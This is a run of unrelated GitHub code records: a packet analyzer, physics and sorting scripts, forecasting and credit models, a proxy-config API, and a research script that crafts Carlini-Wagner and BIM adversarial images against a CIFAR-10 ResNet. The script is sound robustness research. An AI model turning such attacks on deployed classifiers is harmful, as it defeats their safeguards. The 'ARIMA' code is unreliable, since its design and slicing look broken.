plt.ylabel(r'F($\\xi$) [$k_BT$]')\n","repo_name":"debeshmandal/starpolymers","sub_path":"archive/energyer.py","file_name":"energyer.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"26708409312","text":"import argparse\nimport os\nfrom scapy.all import *\nfrom binascii import *\nfrom modules.filters import analyze_udp as udp, analyze_tcp as tcp, analyze_icmp as icmp, analyze_arp as arp, \\\n analyze_all as all\nfrom util import consts\n\nPCAP_FILE_NAME = \"trace-2.pcap\"\nPCAP_FILE_PATH = \".\\packets\\\\\" + PCAP_FILE_NAME\n\n\n\n\ndef main():\n \"\"\"\n main function which is called when program is started\n this function takes an argument -p as protocol to indicate which protocol should be analyzed from a pcap file\n if no argument is given it analyzes all packets\n \"\"\"\n parser = 
argparse.ArgumentParser()\n\n parser.add_argument(\n \"-p\",\n type=str,\n help=\"Specifies protocol to be parsed\",\n )\n\n parser.add_argument(\n \"-f\",\n type=str,\n help=\"Name of pcap file to be analyzed. If it is not given program analyzes const file defined above\"\n )\n args = parser.parse_args()\n\n if args.f is not None:\n global PCAP_FILE_NAME\n PCAP_FILE_NAME = args.f\n global PCAP_FILE_PATH\n PCAP_FILE_PATH = \".\\packets\\\\\" + PCAP_FILE_NAME\n\n if PCAP_FILE_NAME[-5:] != \".pcap\":\n print(\"Incorrect file type\")\n print(\"File need to be a .pcap type\")\n return\n if not os.path.exists(PCAP_FILE_PATH):\n print(\"{} is not in .\\\\packets\".format(PCAP_FILE_NAME))\n print(\"Please add file to directory\")\n return\n\n\n\n if args.p is not None:\n if args.p.upper() in consts.CORRECT_PROTOCOLS:\n if args.p.upper() == \"ICMP\":\n analyze_icmp()\n elif args.p.upper() == \"ARP\":\n analyze_arp()\n elif args.p.upper() == \"TFTP\":\n analyze_udp()\n else:\n analyze_tcp(args.p.upper())\n\n else:\n print(\"{} is a incorrect protocol\".format(args.p.upper()))\n else:\n analyze_all()\n\n\ndef analyze_arp() -> None:\n \"\"\"\n function that is called when parameter for protocol was ARP\n starts the analyzation of packet communication with arp protocol\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n arp.AnalyzeArp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_icmp() -> None:\n \"\"\"\n function that is called when paramater -p was icmp and it starts\n the analyzation of communication between packets with icmp protocol\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n icmp.AnalyzeIcmp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_udp() -> None:\n \"\"\"\n function which is called when parameter -p was tftp\n it starts the analyzation of tftp packets and their communications\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n udp.AnalyzeUdp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_all() -> None:\n \"\"\"\n function which is called when paramter -p was not given\n it starts the analyzation of all packets\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n all.AnalyzeAll(packets, PCAP_FILE_NAME)\n\n\ndef analyze_tcp(protocol: str) -> None:\n \"\"\"\n function which is called when parameter -p had an tcp protocol\n it starts the analyzation of given tcp protocol and its communications\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n tcp.AnalyzeTcp(packets, PCAP_FILE_NAME, protocol)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Wormiq056/Internet-packet-analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74715781362","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.platform import flags\nfrom keras.layers import Input\nfrom cleverhans.attacks import CarliniWagnerL2\nfrom 
cleverhans.dataset import MNIST\nfrom cleverhans.loss import CrossEntropy\nfrom cleverhans.utils import grid_visual, AccuracyReport\nfrom cleverhans.utils import set_log_level\nfrom cleverhans.utils_tf import model_eval, tf_model_load\nfrom cleverhans.train import train\nfrom cleverhans.utils_keras import KerasModelWrapper\t\nfrom build_model import ImageModel \nfrom load_data import ImageData, split_data\nimport pickle as pkl\nfrom keras.utils import to_categorical\nfrom attack_model import Attack, CW, BIM\nimport scipy\n\n\nif __name__ == '__main__':\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('--dataset_name', type = str, \n\t\tchoices = ['cifar10'], \n\t\tdefault = 'cifar10')\n\n\tparser.add_argument('--model_name', type = str, \n\t\tchoices = ['resnet'], \n\t\tdefault = 'resnet') \n\n\tparser.add_argument('--data_sample', type = str, \n\t\tchoices = ['x_train', 'x_val', 'x_val200'], \n\t\tdefault = 'x_val200')\n\n\tparser.add_argument(\n\t\t\t'--attack',\n\t\t\ttype = str,\n\t\t\tchoices = ['cw', 'bim', 'bim2'],\n\t\t\tdefault = 'cw'\n\t)\n\n\targs = parser.parse_args()\n\tdict_a = vars(args) \n\tdata_model = args.dataset_name + args.model_name\n\n\tif data_model not in os.listdir('./'):\t\n\t\tos.mkdir(data_model)\n\tif 'results' not in os.listdir('./{}'.format(data_model)):\n\t\tos.mkdir('{}/results'.format(data_model))\n\tif 'models' not in os.listdir(data_model):\n\t\tos.mkdir('{}/models'.format(data_model))\n\tif 'data' not in os.listdir(data_model):\n\t\tos.mkdir('{}/data'.format(data_model))\n\tif 'figs' not in os.listdir(data_model):\n\t\tos.mkdir('{}/figs'.format(data_model))\n\n\tprint('Loading dataset...') \n\tdataset = ImageData(args.dataset_name)\n\tmodel = ImageModel(args.model_name, args.dataset_name, train = False, load = True)\n\n\tif args.dataset_name == 'cifar10':\n\t\tX_train, Y_train, X_test, Y_test = split_data(dataset.x_val,\n\t\t\tdataset.y_val, model, num_classes = 10, \n\t\t\tsplit_rate = 0.8, sample_per_class = 1000)\n\n\n\tprint('Sanity checking...')\n\tdata_sample = X_test\n\tprint('data_sample.shape', data_sample.shape)\n\tprint('X_train.shape', X_train.shape)\n\n\tpred_test = model.predict(dataset.x_val)\n\tdef cross_entropy(predictions, targets, epsilon=1e-12):\n\t\tpredictions = np.clip(predictions, epsilon, 1. - epsilon)\n\t\tN = predictions.shape[0]\n\t\tce = -np.sum(targets*np.log(predictions+1e-9))/N\n\t\treturn ce\n\n\tce = cross_entropy(pred_test, dataset.y_val, epsilon=1e-12)\n\tacc = np.mean(np.argmax(pred_test, axis = 1) == np.argmax(dataset.y_val, axis = 1))\n\tprint('The accuracy is {}. 
The cross entropy is {}.'.format(acc, ce))\n\n\n\tif args.attack == 'cw':\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = CW(\n\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\tsource_samples = 100,\n\t\t\t\t\tbinary_search_steps = 5, \n\t\t\t\t\tcw_learning_rate = 1e-2, \n\t\t\t\t\tconfidence = 0, \n\t\t\t\t\tattack_iterations = 100, \n\t\t\t\t\tattack_initial_const = 1e-2,\n\t\t\t\t)\n\telif args.attack == \"bim\":\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = BIM(\n\t\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\t\tmodel.sess,\n\t\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\t\tattack_iterations = 100,\n\t\t\t\t\t\tepsilon=0.03,\n\t\t\t\t\t\tlearning_rate=2.5 * 0.03 / 100,\n\t\t\t\t\t\trandom_init=True\n\t\t\t\t)\n\telif args.attack == \"bim2\":\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = BIM(\n\t\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\t\tmodel.sess,\n\t\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\t\tattack_iterations = 10,\n\t\t\t\t\t\tepsilon=0.03,\n\t\t\t\t\t\tlearning_rate=2.5 * 0.03 / 10,\n\t\t\t\t\t\trandom_init=True\n\t\t\t\t)\n\n\n\t###################################################\n\t# filter data samples with correct predictions by model and successsful attacks\n\t###################################################\n\n\tdata_types = ['train', 'test']\n\tdata = {'train': (X_train, Y_train), 'test': (X_test, Y_test)}\n\tif args.data_sample == 'x_val200':\n\t\tnum_samples = {'train': 800, 'test': 200}\n\n\tfor data_type in data_types:\n\t\tx, y = data[data_type]\n\t\tprint('x.shape', x.shape)\n\t\tprint('y.shape', y.shape)\n\t\tnum_successes = 0\n\t\toris = []\n\t\tperturbeds = []\n\n\n\t\tbatch_size = int(np.minimum(100, num_samples[data_type]))\n\t\tcur_batch = 0\n\t\tconf = 15\n\t\tepsilon = 0\n\t\twhile num_successes < num_samples[data_type]:\n\t\t\tbatch_x, batch_y = x[cur_batch * batch_size:(cur_batch+1) * batch_size], y[cur_batch * batch_size:(cur_batch+1) * batch_size]\n\n\t\t\tprint('batch_x', batch_x.shape)\n\t\t\tx_adv = attack_model.attack(batch_x)\n\t\n\t\t\tprint('x_adv', x_adv.shape)\n\t\t\tif x_adv.shape[0] == 0:\n\t\t\t\tcontinue\n\t\t\tx_adv_labels = np.argmax(model.predict(x_adv), axis = -1)\n\t\t\tindex_filter = (x_adv_labels != np.argmax(batch_y, axis = 1))\n\t\t\tori = batch_x[index_filter]\n\t\t\tperturbed = x_adv[index_filter]\n\t\t\tprint('Success rate', perturbed.shape[0] / len(x_adv))\n\t\t\toris.append(ori)\n\t\t\tperturbeds.append(perturbed)\n\n\t\t\tcur_batch += 1\n\t\t\tnum_successes += len(ori)\n\t\t\tprint('Number of successsful samples is {}'.format(num_successes))\n\n\t\toris = np.concatenate(oris, axis = 0)\n\t\tperturbeds = np.concatenate(perturbeds, axis = 0)\n\n\t\toris = oris[:num_samples[data_type]]\n\t\tperturbeds = perturbeds[:num_samples[data_type]]\n\n\t\tprint('oris.shape', oris.shape)\n\t\tprint('perturbeds.shape', perturbeds.shape)\n\n\t\tnp.save('{}/data/{}{}_{}_{}.npy'.format(\n\t\t\tdata_model, \n\t\t\targs.data_sample,\n\t\t\t'' if data_type == 'test' else '_train',\n\t\t\targs.attack, \n\t\t\t'ori'), \n\t\t\toris)\n\t\tnp.save('{}/data/{}{}_adv_{}_{}.npy'.format(\n\t\t\tdata_model, \n\t\t\targs.data_sample,\n\t\t\t'' if data_type == 'test' else '_train',\n\t\t\targs.attack, \n\t\t\t'ori'), 
\n\t\t\tperturbeds)\n\n","repo_name":"google-research/active-adversarial-tests","sub_path":"case_studies/ml_loo/generate_attack.py","file_name":"generate_attack.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"75"} +{"seq_id":"11813171837","text":"import numpy as np\nimport scipy.integrate as si\nimport matplotlib.pyplot as plt\nimport seaborn as sb\n\n# este programa fue creado por marcos sidoruk como un trabajo final de fisica 2\n#\n# el problema a resolver consiste en un interferometro similar al de michaelson\n# se pide la distribucion de intensidad en una pantalla ubicada a una cierta distancia\n# de dos fuentes que se posicionan una detras de la otra con respecto a la pantalla\n# luego se pide la misma distribucion si la pantalla se inclina arbitrariamente\n#\n# por motivos tecnicos, es mucho mas facil mover las fuentes que la pantalla\n# por lo tanto disenaremos el programa tal que la pantalla este fija en el plano xy\n# y sean las fuentes las que se muevan para que estas terminen a la inclinacion que el\n# usuario desee, ademas el programa contara con grados de libertad\n# extra que no son requeridas por el enunciado pero que son faciles de implementar y\n# resultan en codigo mas limpio.\n\n\n# DEFINICIONES:\n\n# el usuario puede cambiar las siguientes:\n\nC = 0.1 # velocidad de las ondas\n\n# nota: la pantalla esta centrada en el 0 y es cuadrada de lado DEF_SCREEN_SIZE\nDEF_SCREEN_RES = 10 # factor de conversion pixeles/metro\nDEF_SCREEN_SIZE = 20 # en metros\nDEF_SCREEN_TIME_RES = 1 # intervalo de tiempo sobre el cual la pantalla promedia la intensidad\n\n# esto es una manera de definir una funcion source() tal que se puedan crear multiples\n# instancias cada una con distintos valores para ciertos parametros internos\n# primero se crea un objeto de esta clase lo que automaticamente llama a __init__ y\n# inicializa los parametros, luego el objeto se puede usar como una funcion gracias al\n# metodo __call__\n# cada instancia de esta clase representa una fuente puntual.\nclass source:\n\n def __init__( self, position: np.ndarray, ang_freq, phase = 0, amplitude = 1, line = False ):\n \n self.position = position\n self.ang_freq = ang_freq\n self.phase = phase\n self.amplitude = amplitude\n self.spacial_ang_freq = self.ang_freq / C\n \n self.line = line\n if line == True:\n self.position = np.append( position[0:1], position[2] )\n\n def __call__( self, x: np.ndarray, t: float ):\n \n if self.line == True:\n x = np.append( x[0:1], x[2] )\n\n r = np.linalg.norm(x-self.position)\n t_phase = self.ang_freq * t - self.spacial_ang_freq * r + self.phase\n \n return self.amplitude * np.sin( t_phase )/r\n\n# misma cosa que arriba, solo que esta clase debe inicializarse una sola vez\n# define una funcion que retorna el proedio temporal de la intensidad en cada pixel de la pantalla\nclass init_screen:\n\n def __init__( self, screen_size, source_list, screen_resolution = DEF_SCREEN_RES, screen_time_res = DEF_SCREEN_TIME_RES ): \n self.size = screen_size\n self.res = screen_resolution\n self.sources = source_list\n self.time_res = screen_time_res\n\n # crea grid correspondiente a la pantalla:\n self.num_pixels = self.res * self.size # n de pixeles en una direccion\n \n sl = self.size/2\n jmp = 1/self.res\n\n self.screen = np.mgrid[ -sl:sl:jmp, -sl:sl:jmp ]\n self.screen = self.screen.T\n \n def get_intensity( self, x, t ):\n \n field = 0\n for s in self.sources:\n field += s( x, t )\n\n return field**2\n\n # 
obtener la intensidad en todos los pixeles de la pantalla a tiempo t\n def __call__( self, t ):\n \n result = np.zeros( ( self.num_pixels, self.num_pixels ) )\n\n for i, row in enumerate( self.screen ):\n for j, v in enumerate( row ):\n v = np.append(v,0) \n pix_int = lambda t0: self.get_intensity( v, t0 )\n result[i][j] = si.quad( pix_int, t, t+self.time_res )[0]/self.time_res\n\n return result\n\n# utilidad para pasar de polares a cartesianas\ndef polar_to_cart( r, theta ):\n\n x = r*np.cos(theta)\n y = r*np.sin(theta)\n return x,y\n \n# resuelve el problema del enunciado\ndef michaelson_angle( alpha, distances: list, ang_freq, screen_size = DEF_SCREEN_SIZE, screen_res = DEF_SCREEN_RES):\n \n source_list = []\n for d in distances:\n z, x = polar_to_cart( d, alpha )\n v = np.array([ x, 0, z ])\n s = source( v, ang_freq)\n source_list.append(s)\n\n screen = init_screen( screen_size, source_list, screen_resolution = screen_res )\n \n measurement = screen(0)\n max_value = np.amax( measurement )\n\n sb.set()\n sb.heatmap( measurement, vmin=0, vmax = max_value )\n plt.savefig(\"michaelson.jpg\")\n\n# extra:\ndef young( d_sources: list, d_screen, ang_freq, screen_size = DEF_SCREEN_SIZE ):\n \n source_list = []\n for d in d_sources:\n source_list.append( source( np.array([ d, 0, d_screen ] ), ang_freq, line = True ) )\n\n screen = init_screen( screen_size, source_list )\n\n measurement = screen(0)\n max_val = np.amax( measurement )\n\n sb.set()\n sb.heatmap( measurement, vmin = 0, vmax = max_val )\n plt.savefig(\"young.jpg\")\n\n\n#young( [-1, 1], 10, 100 )\nmichaelson_angle( 0, [2,4], 10 )\n","repo_name":"KITOS2003/Otros-Scripts-de-F2","sub_path":"tp_numerico.py","file_name":"tp_numerico.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42914510834","text":"\"\"\"\nMerge Sort Sorting Algorithm\n\"\"\"\nimport math\n\n\ndef merge_sort(arr: list) -> list:\n length = len(arr)\n if length == 1:\n return arr\n # Split array in into right and left\n middle = math.floor(length / 2)\n left = arr[0:middle]\n right = arr[middle:]\n\n return merge(merge_sort(left), merge_sort(right))\n\n\ndef merge(left: list, right: list) -> list:\n result = []\n left_index = 0\n right_index = 0\n while (left_index < len(left)) and (right_index < len(right)):\n if left[left_index] < right[right_index]:\n result.append(left[left_index])\n left_index += 1\n else:\n result.append(right[right_index])\n right_index += 1\n return result + left[left_index:] + right[right_index:]\n\n\narr = [99, 44, 6, 2, 1, 5, 63, 87, 283, 4, 0]\nprint(merge_sort(arr))\n","repo_name":"SteliosGian/data-structures-and-algorithms","sub_path":"algorithms/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70104290804","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Load data\ndata = pd.read_csv('your_data_file.csv', index_col=0)\nvalues = data.values.astype('float32')\n\n# Define ARIMA model\nclass ARIMA(nn.Module):\n def __init__(self, p, d, q):\n super(ARIMA, self).__init__()\n self.ar = nn.Linear(p, 1, bias=False)\n self.ma = nn.Linear(q, 1, bias=False)\n self.d = d\n\n def forward(self, x):\n ar_term = self.ar(x[:, :-self.d])\n ma_term = self.ma(x[:, -self.d:])\n return ar_term + ma_term\n\n# Define hyperparameters\np = 
0\nd = 1\nq = 1\nlr = 0.001\nepochs = 1000\n\n# Create ARIMA model\nmodel = ARIMA(p, d, q)\n\n# Define loss function and optimizer\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n# Train model\nfor epoch in range(epochs):\n # Reset gradient\n optimizer.zero_grad()\n\n # Forward pass\n inputs = torch.tensor(values[:-1])\n targets = torch.tensor(np.diff(values, axis=0))\n outputs = model(inputs)\n\n # Compute loss and backpropagation\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n # Print progress\n if (epoch+1) % 100 == 0:\n print('Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, epochs, loss.item()))\n\n# Predict future values\nfuture_inputs = torch.tensor(values[-1:])\nfor i in range(12):\n future_outputs = model(future_inputs)\n future_inputs = torch.cat((future_inputs, future_outputs), dim=1)\n\n# Plot results\nplt.plot(values, label='Original')\nplt.plot(np.concatenate((values[:-1], values[-1:] + future_outputs.detach().numpy())), label='Predicted')\nplt.legend()\nplt.show()\n","repo_name":"benjamin-botbol/arima_torch","sub_path":"arima.py","file_name":"arima.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5013822927","text":"# -*- coding: utf-8 -*-\n# @Author: limeng\n# @File : 3model_ning.py\n# @time : 2019/7/2\n\"\"\"\n文件说明:\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, log_loss, accuracy_score,roc_auc_score\n\noripath = \"/home/dev/lm/paipai/ori_data/\"\nfeature_path = '/home/dev/lm/paipai/feature_ning/'\n\ntrain = pd.read_csv(feature_path+\"ning_train.csv\")\ntest = pd.read_csv(feature_path+\"ning_test.csv\")\n\ny = \"early_repay_days\"\n\ndrop_list= ['age','info_insert_date','taglist','repay_amt','repay_date','early_repay_days','late_repay_days','auditing_date','listing_id','user_id']\nfeatures = []\nfor col in train.columns:\n if col not in drop_list:\n features.append(col)\n\nn = 33\n\nimport sys\nsys.path.append(\"/home/dev/lm/utils_lm\")\nsys.path.append(\"/home/dev/lm/DeepCTR_multi\")\n\nX_train = train[features]\nX_test = test[features]\nfor i in X_train.columns:\n X_train[i] = X_train[i].fillna(X_train[i].median())\n X_test[i] = X_test[i].fillna(X_test[i].median())\n\nX_test = X_test.reset_index(drop=True)\n\nsparse_features = [\"info_insert_date_month\",\"reg_mon_date_month\",\"due_date_day\"]\ndense_features = [i for i in X_train.columns if i not in sparse_features]\ntarget = y\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom deepctr1.models import DeepFM\nfrom deepctr1.utils import SingleFeat\n\n#对稠密特征归一化\nmms = MinMaxScaler(feature_range=(0, 1))\nX_train[dense_features] = mms.fit_transform(X_train[dense_features])\nX_test[dense_features] = mms.transform(X_test[dense_features])\n\n#对稀疏特征编码 千维特征速度奇慢\nfor feat in sparse_features:\n lbe = LabelEncoder()\n X_train[feat] = lbe.fit_transform(X_train[feat])\n X_test[feat] = lbe.transform(X_test[feat])\n\nsparse_feature_list = [SingleFeat(feat, X_train[feat].nunique()) # since the input is string\n for feat in sparse_features]\ndense_feature_list = [SingleFeat(feat, 0, )\n for feat in dense_features]\n\ntrain_model_input = [X_train[feat.name].values for feat in sparse_feature_list] + \\\n [X_train[feat.name].values for feat in dense_feature_list]\ntest_model_input = [X_test[feat.name].values for feat in 
sparse_feature_list] + \\\n [X_test[feat.name].values for feat in dense_feature_list]\n\nt_true = pd.get_dummies(train[target])\nmodel = DeepFM({\"sparse\": sparse_feature_list,\"dense\": dense_feature_list}, task='multi-class')\n# model.compile(\"adam\", \"binary_crossentropy\", metrics=['binary_crossentropy'], ) #2.1897\nmodel.compile(\"adam\", \"categorical_crossentropy\", metrics=['crossentropy'], ) #\n\nhistory = model.fit(train_model_input, t_true.values,batch_size=512, epochs=10, verbose=2, validation_split=0.2, )\npred_train = model.predict(train_model_input, batch_size=512)\nprint(\"train score\", log_loss(train[target].values, pred_train))\n\npred_test = model.predict(test_model_input, batch_size=512)\n\n#####输出结果\n# train_prob = pd.DataFrame(pred_train)\n# train_dic = {\n# \"user_id\": train[\"user_id\"].values,\n# \"listing_id\":train[\"listing_id\"].values,\n# \"auditing_date\":train[\"auditing_date\"].values,\n# \"due_date\":train[\"due_date\"].values,\n# \"due_amt\":train[\"due_amt\"].values,\n# }\n# for key in train_dic:\n# train_prob[key] = train_dic[key]\n# train_prob.to_csv(feature_path + 'sub_ning_dfm.csv', index=None)\n\ntest_prob = pd.DataFrame(pred_test)\ntest_dic = {\n \"user_id\": test[\"user_id\"].values,\n \"listing_id\":test[\"listing_id\"].values,\n \"auditing_date\":test[\"auditing_date\"].values,\n \"due_amt\":test[\"due_amt\"].values,\n}\nfor key in test_dic:\n test_prob[key] = test_dic[key]\n#输出预测概率\n# test_prob.to_csv(outpath+'out_dfm368_test.csv',index=None)\nfor i in range(n-1):\n test_prob[i] = test_prob[i]*test_prob[\"due_amt\"]\n#对于训练集评价\ndef df_rank(df_prob, df_sub):\n for i in range(33):\n print('转换中',i)\n df_tmp = df_prob[['listing_id', i]]\n df_tmp['rank'] = i+1\n df_sub = df_sub.merge(df_tmp,how='left',on=[\"listing_id\",'rank'])\n df_sub.loc[df_sub['rank']==i+1,'repay_amt']=df_sub.loc[df_sub['rank']==i+1,i]\n return df_sub[['listing_id','repay_amt','repay_date']]\n#提交\nsubmission = pd.read_csv(open(oripath+\"submission.csv\",encoding='utf8'),parse_dates=[\"repay_date\"])\nsubmission['rank'] = submission.groupby('listing_id')['repay_date'].rank(ascending=False,method='first')\nsub = df_rank(test_prob, submission)\nsub.to_csv(feature_path+'sub_ning_dfm.csv',index=None)","repo_name":"LibraM9/DeepCTR-multi","sub_path":"3model_ning.py","file_name":"3model_ning.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"25553406775","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import FileResponse\nfrom ipaddress import ip_network, ip_address\nimport uvicorn\nfrom snitch import Snitch\nimport os\nfrom dotenv import load_dotenv\n# from fastapi.middleware.cors import CORSMiddleware\n\nAPP_API = FastAPI()\nsnitch = Snitch()\nload_dotenv()\nip = os.getenv(\"IP_ADDRESS\")\nhost = os.getenv(\"HOST\")\nport = os.getenv(\"PORT\")\nport = int(port)\nmethod = os.getenv(\"METHOD\")\n\n# you can use middlevare for prod environment\n# origins = [\n# \"http://localhost:3000\"\n# ]\n\n#APP_API.add_middleware(\n# CORSMiddleware,\n# allow_origins=origins,\n# allow_credentials=True,\n# allow_methods=[\"*\"],\n# allow_headers=[\"*\"],\n#)\n\n@APP_API.get(\"/status\")\nasync def status():\n return \"ok\"\n\n@APP_API.post('/update')\nasync def update(request: Request):\n try:\n # get ports and passwords from POST Query\n users = await request.json()\n return snitch.updateConfig(users, ip, method)\n except Exception as e:\n print(f\"Configuration file 
updating failed - {str(e)}\")\n return False\n\nif __name__ == '__main__':\n uvicorn.run(APP_API, \n host=host, \n port=port, \n # ssl_certfile=r'/www/wwwroot/certificate.crt', \n # ssl_keyfile=r'/www/wwwroot/private.key', \n log_level='info')\n \n","repo_name":"OGBobston/Shadowsocks-Python-WebAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30386346855","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on May 31 10:55:40 2023\n\n@author: Jerome Yutai Shen\n\n\"\"\"\nfrom typing import List\n\n\ndef max_subsequence(a: List[int], diff = 1):\n count = {}\n for num in a:\n count[num] = count.get(num, 0) + 1\n\n max_len=0\n for num in count:\n max_len = max(max_len, count[num] + count.get(num + diff, 0))\n return max_len\n\n\nif __name__ == \"__main__\":\n print(max_subsequence([1,3,2,2,5,2,3,7]))","repo_name":"jerome-yutai-shen/leetcode_challenges","sub_path":"longest_subsequence.py","file_name":"longest_subsequence.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16604190957","text":"import wavemqtt\n\n# config information\nSMARTCITIES_NAMESPACE = 'GyAHBqhwQ9hEYEYArz0vUhHsUmMT6NC9TdoA2mhH5-DGoA=='\n\n# also serves as subscribe topic\na_uuid = \"8607a83a-b7a2-11e8-8755-0cc47a0f7eea\"\n\n### SUBSCRIBER\ndef b_cb(client, ud, msg):\n print('b got', msg.topic, msg.payload)\nb = wavemqtt.Client(\"b\", on_message=b_cb)\nprint(\"entity is\", b.b64hash)\n\nb.subscribe(SMARTCITIES_NAMESPACE, a_uuid)\n\n# block and wait for data\nimport time\nwhile True:\n time.sleep(1)\n","repo_name":"conix-center/smart-cities-demo","sub_path":"wave/mqtt-client/python/examples/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73231281522","text":"import random\r\nimport tkinter as tk\r\nimport time\r\n\r\n\r\n# 创建山脉生成器的类\r\nclass MountainGenerator:\r\n def __init__(self, canvas, interactive=False):\r\n self.canvas = canvas\r\n self.interactive = interactive\r\n self.points = [] # 存储山脉的点\r\n self.roughness = 0.25 # 初始粗糙度\r\n self.p0 = None # 未使用\r\n self.iterations = 3 # 初始迭代次数\r\n\r\n # 设置粗糙度\r\n def set_roughness(self, roughness):\r\n self.roughness = roughness\r\n\r\n # 设置迭代次数\r\n def set_iterations(self, iterations):\r\n self.iterations = iterations\r\n\r\n # 计算两点之间的中点,并对其进行位移\r\n def displace_point(self, p1, p2):\r\n # 从参数p1和p2中提取x1, y1和x2, y2的坐标\r\n x1, y1 = p1\r\n x2, y2 = p2\r\n\r\n # 计算两个点的中间x坐标\r\n x = (x1 + x2) / 2\r\n\r\n # 计算p1和p2之间的距离(欧几里德距离)\r\n length = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\r\n\r\n # 如果x1和x2之间的距离小于等于1,返回p1(不进行位移)\r\n if abs(x1 - x2) <= 1:\r\n return p1\r\n\r\n # 否则,计算一个新的y坐标,通过在原始y坐标上添加一个随机的偏移值\r\n # 偏移值在 -self.roughness 和 self.roughness 之间随机选择\r\n new_y = y1 + length * random.uniform(-self.roughness, self.roughness)\r\n\r\n # 返回新的坐标点 (x, new_y)\r\n return x, new_y\r\n\r\n # 执行中点位移算法\r\n def midpoint_displacement(self, p1, p2, iterations):\r\n # 基本情况:如果迭代次数已经为0,返回起点p1和终点p2\r\n if iterations == 0:\r\n return [p1, p2]\r\n\r\n # 计算中点pc,通过调用displace_point函数对p1和p2之间的中点进行位移\r\n pc = self.displace_point(p1, p2)\r\n\r\n # 如果位移后的中点等于起点p1,表示不需要再细分,直接返回起点p1和终点p2\r\n if pc == p1:\r\n return [p1, p2]\r\n else:\r\n # 递归调用,将问题拆分为两个子问题:\r\n # 1. 
